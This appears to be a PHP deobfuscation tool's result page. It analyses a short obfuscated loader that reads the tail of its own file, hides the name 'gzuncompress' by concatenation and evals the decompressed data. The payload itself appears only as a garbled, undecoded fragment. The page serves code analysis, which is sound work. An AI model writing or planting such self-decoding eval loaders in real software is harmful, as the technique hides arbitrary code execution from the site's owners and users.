Find this useful? Enter your email to receive occasional updates for securing PHP code.

Signing you up...

Thank you for signing up!

PHP Decode

<?php $d = substr(file_get_contents( __FILE__ ), -11880); $d = str_replace('eghybwmjki',..

Decoded Output download

<?php 
$d = substr(file_get_contents( __FILE__ ), -11880); 
$d = str_replace('eghybwmjki', "<", $d); 
$d = str_replace('hvaceqrtxo', ">", $d); 
$g = 'g'.'z'.'un'.'compr'.'e'.'ss'; 
eval($g($d)); 
exit; 
?> 
xzel^?3hvaceqrtxo13)hgGZivUW:u-53jVHTAPHIYCV\u2019fRZAYLTA]Th7o7okK;WZ7SWgZ

Did this file decode correctly?

Original Code

<?php
$d = substr(file_get_contents( __FILE__ ), -11880);
$d = str_replace('eghybwmjki', "<", $d);
$d = str_replace('hvaceqrtxo', ">", $d);
$g = 'g'.'z'.'un'.'compr'.'e'.'ss';
eval($g($d));
exit;
?>
xzel^?3hvaceqrtxo13)hgGZivUW:u-53jVHTAPHIYCV\fRZAYLTA]Th7o7okK;WZ7SWgZ

Function Calls

substr 1
str_replace 2
gzuncompress 1
file_get_contents 1

Variables

$d
$g gzuncompress

Stats

MD5 03e450d0dae134d91e4357f72555a597
Eval Count 0
Decode Time 334 ms